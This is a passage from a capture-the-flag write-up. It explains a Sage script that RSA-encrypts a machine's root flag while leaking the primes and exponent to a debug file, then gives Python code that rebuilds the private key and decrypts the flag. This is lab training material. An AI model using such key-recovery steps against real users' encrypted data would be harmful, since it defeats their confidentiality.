p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
```

So this script reads root's flag and stores it as an integer in **m** (via its hex encoding). It then generates two random 512-bit primes **p** and **q**, multiplies them to get the modulus **n**, computes **phi** = (**p**-1)\*(**q**-1) and picks a random exponent **e** coprime to phi. Finally it computes the ciphertext **c** = m^e mod n, which is written to **output.txt**, while **p**, **q** and **e** go to **debug.txt**. That is textbook RSA, and since the primes are leaked, the private exponent is trivial to recover.

![value of C](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsbV-a4S-j9lLIXgyK%2Fimage.png?alt=media\&token=6dc35fa8-beb3-4a74-aab9-3857caf25eb2)

![Values of P, Q and E](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQscTDbhb5KTxzobfYd%2Fimage.png?alt=media\&token=f4f7edea-cfab-4dc4-96af-522f2d084e64)

Looking for how to decrypt RSA given those values, we found the following link:

{% embed url="<https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e>" %}

Modifying the script on that page we end up with this one:

```python
def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        q, r = b // a, b % a
        m, n = x - u * q, y - v * q
        b, a, x, y, u, v = a, r, u, v, m, n
    return b, x, y

def main():

    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e (the coefficient can come back negative, so reduce it mod phi)
    gcd, a, b = egcd(e, phi)
    d = a % phi

    print("d:  " + str(d))

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print("pt: " + str(pt))

if __name__ == "__main__":
    main()
```

![Script output](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQsg20dHgVPmNKpavGe%2Fimage.png?alt=media\&token=4d507fdd-263f-470c-8f68-c2c893880954)

As we can see we have the value of the password (root.txt), but we still need to decode it, since it was hex-encoded into an integer at the beginning of **encrypt.sage**. For that we modify our script; the final version looks like this:

```python
def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    x, y, u, v = 0, 1, 1, 0
    while a != 0:
        q, r = b // a, b % a
        m, n = x - u * q, y - v * q
        b, a, x, y, u, v = a, r, u, v, m, n
    return b, x, y

def main():

    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e (the coefficient can come back negative, so reduce it mod phi)
    gcd, a, b = egcd(e, phi)
    d = a % phi

    print("d:  " + str(d))

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print("pt: " + str(pt))

    # The plaintext integer is the hex encoding of root.txt: turn it back into bytes
    root = pt.to_bytes((pt.bit_length() + 7) // 8, "big")
    print(root.decode())

if __name__ == "__main__":
    main()
```

Now, if we execute it again...

![Root? flag :D](https://3508673774-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MKuPhDjj3CjPI4MC20J%2F-MQsIpCrfpXP9iQSXnOQ%2F-MQshVNQnZaoYxFxXIzc%2Fimage.png?alt=media\&token=4489d84a-9053-4681-8165-bee37dcff426)
